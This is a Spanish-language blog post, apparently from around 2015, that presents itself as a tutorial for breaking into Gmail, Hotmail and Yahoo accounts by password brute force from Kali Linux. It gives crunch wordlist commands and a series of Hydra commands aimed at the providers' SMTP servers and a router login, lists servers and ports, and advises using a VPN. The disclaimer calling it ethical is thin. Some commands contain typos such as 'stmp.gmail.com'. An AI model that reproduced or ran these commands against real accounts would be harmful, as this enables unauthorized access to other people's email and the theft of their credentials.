Cómo hackear una cuenta de GMAIL con Fuerza Bruta en Kali Linux

Últimamente la gente anda desesperada porque hacer estos tipos de métodos y he decidido en mostrar un pequeño metodo donde podrás acceder a una cuenta de “GMAIL”.
Y este tutorial se hace con el fin ético, no deseo mas mensajes como esto, gracias.

Primer paso:
Conseguir o hacer un buen diccionario.
se van a la terminal y crean uno con “CRUNCH”

Screenshot from 2015-10-30 21:39:33

Te dare un ejemplo:
crunch 5 9 abcdefghijklmnopkrstuvwxyz -o /root/Desktop/pass.lst

Luego seguimos en nuestra terminal.

Segundo Paso:
La herramienta se llama “Hydra”

Screenshot from 2015-10-30 21:42:45

Este método es un poco antiguo entonces las personas que tengan su cuenta bien configurada y protegida le saltara una alerta.

Screenshot from 2015-10-30 21:31:36

Les recomiendo que usen VPN

Te dare un Ejemplo:

hydra -S -l email@gmail.com -P /root/Desktop/ArchivoDiccionario -v -V -e ns -s 465 smtp.gmail.com smtp

Desde aquí viene la actualización  de este post.

Hoy me he levantado con una resaca pero aqui me tienen actualizando mi post. Vale usaremos la misma herramienta “HYDRA”

Se preguntarán que es HYDRA?

Hydra es una  entrada paralelizado que soporta numerosos protocolospara atacar.  Es muy rápido y flexible, y los nuevos módulos son fáciles de agregar. Esta herramienta permite a los investigadores y consultores de seguridad para mostrar lo fácil que sería la de obtener acceso no autorizado a un sistema remoto. Es compatible con: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Info about mail accounts
gmail
server: smtp.gmail.com
port: 465
hotmail
server: smtp.live.com
port: 587
yahoo
server: smtp.mail.yahoo.com
port:587
Después de terminar de leer la teoría básica sobre HYDRA.
He estado jugando con mis cuentas de GMAIL y aunque sacará la contraseña me lanza alerta de intruso conectado pero ese es otro tema. En este caso haremos una fuerza bruta para solo obtener la contraseña.
Screenshot from 2015-12-25 13:05:59
Ahora me preguntarán CREAD cual seria  ese comando?
Bueno he estado investigando alguna data sobre SMTP porque en otro países cambiar. Te doy un ejemplo “RUSIA”
smt.mail.ru pero fijate que no es de GMAIL.
Ahora lo que investigue esta aqui….. y por aqui

Se basa de comandos y opciones HYDRA.

 hydra -S -l test@gmail.com -P (DICCIONARIO) -v -V -e ns -s 465 smtp.gmail.com smtp

Ahora el comando que uso es

 hydra -s 465 -S -v -V -l test@gmail.com -P (DICCIONARIO) -t 1 -w 32 stmp.gmail.com smtp

Te recomiendo que no lo copies y peges y lo escribas en tu terminal.

Screenshot from 2015-12-25 13:11:09
Para más comandos y opciones son los siguiente.

 hydra -x -h

Puedes atacar con carácter especifico que nos ofrece hydra como si tuvieras un diccionario.
“8:10:a1”

 hydra -s 465 -s -v -V -l correo -x 8:10:a1 -t 1 -w 32 smtp.gmail.com smtp

Para redes lean en su soporte para que sea compatible.

 hydra -l admin -P 'DICIONARIO' http://192.168.1.1 -s PUERTO ejemplo 1080

Para HOTMAIL

 hydra -s 587 -s -v -V -l creadpag548@hotmail.com -P '/root/Desktop/cread.txt' -t 1 -w 32 smtp.live.com smtp

PARA YAHOO Lo mismo solo cambias su SMTP y su puerto
Espero haberte ayudado porque es una mega herramienta que solo tienes que jugar y jugar con ella.
Si te gusto ayudame a compartirlo.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s